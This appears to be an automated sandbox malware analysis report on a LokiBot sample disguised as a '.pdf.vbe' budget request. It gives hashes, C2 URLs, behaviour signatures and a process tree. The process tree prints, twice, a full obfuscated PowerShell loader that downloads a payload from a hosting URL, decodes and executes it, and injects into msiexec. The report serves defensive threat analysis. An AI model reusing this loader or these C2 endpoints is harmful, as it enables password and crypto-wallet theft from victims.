Overview

overview

10

Static

static

1

PRORAČUNS...df.vbe

windows7-x64

10

PRORAČUNS...df.vbe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01-10-2024 05:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PRORAČUNSKA ZAHTEVA 09-30-2024·pdf.vbe

  • Size

    73KB

  • MD5

    ae06697b71084618bb9a2d051f6fad2f

  • SHA1

    d3cc11739d47aebc183e425750d53ea0d412c8e0

  • SHA256

    dc6607f4aa63d04407994442f3f085ccd29a2feadac2a791b90cdbcfee2f5fac

  • SHA512

    ea85577950701655694c970ac44a9f80ccca80f59166d0955d946570493b374f364c9fafefd548af04b8d5ebb6d494be64b840fdb55df00070b84bd4ef5dff34

  • SSDEEP

    1536:sM0x6oY5kcFA/RYq0KkFV8N+FhhxGEoU5J/Gbrf:sM0xlYAJYJFFhhFo9f

Score
10/10
lokibotcollectiondiscoveryexecutionspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://137.184.191.215/index.php/check.php?id=1

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 11 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PRORAČUNSKA ZAHTEVA 09-30-2024·pdf.vbe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3064
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers ');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir ';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities) {Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig- HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ') ;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis (Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um: HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9 ,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou )Normy ');Electroendosmosis $Yasmak;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2664
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers ');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir ';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities) {Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig- HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ') ;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis (Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um: HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9 ,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou )Normy ');Electroendosmosis $Yasmak;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2916
    • C:\Windows\syswow64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
        PID:2012
      • C:\Windows\syswow64\msiexec.exe
        "C:\Windows\syswow64\msiexec.exe"
        2⤵
        • Blocklisted process makes network request
        • Accesses Microsoft Outlook profiles
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:1224

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Drgs.Trs
      Filesize

      443KB

      MD5

      aea8e7efe3bdc3cb31b936d38d0453d7

      SHA1

      ae85cf7b5691a9e873f92bca97aa1a3e0a1ce13a

      SHA256

      583dd45f990d328f7e7b098a3215ed9e765cb4456346bb67adff0d9007af88a7

      SHA512

      dd8962bf1e8dd6c2decbaa97e2b2165de542ea02e1ff8727031b038c0318813c955c8a24437e44ccc87c17f7d7ec543dd1a5f719cb9c709e34f40004f70f6f64

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2
      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2
      Filesize

      46B

      MD5

      c07225d4e7d01d31042965f048728a0a

      SHA1

      69d70b340fd9f44c89adb9a2278df84faa9906b7

      SHA256

      8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

      SHA512

      23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ABOY6CN18HS6LD62XESC.temp
      Filesize

      7KB

      MD5

      1634bd8683f04f6dab574ddab652ec64

      SHA1

      8cdc21be226bcf4e10e98723f561c8c704bdd4c6

      SHA256

      ba7698a960abc9837f713c0602bda6f4e632fe99e8aa853dcc9141cb47fc3e06

      SHA512

      a7d2cc2be3759e58a8027d7609004d6f09dca296bb46d6c5261cc10e52c6cccd306d10237731b1af43700f9cfe192608344b847333ad61af3c1dad8c42c4e280

      Download Submit

    • memory/1224-44-0x0000000000400000-0x0000000000581000-memory.dmp

      Filesize

      1.5MB

      Download

    • memory/2664-8-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2664-10-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2664-11-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2664-13-0x000007FEF524E000-0x000007FEF524F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2664-14-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2664-16-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2664-9-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2664-4-0x000007FEF524E000-0x000007FEF524F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2664-7-0x000007FEF4F90000-0x000007FEF592D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2664-6-0x0000000002560000-0x0000000002568000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2664-5-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2916-20-0x00000000063C0000-0x0000000008F42000-memory.dmp

      Filesize

      43.5MB

      Download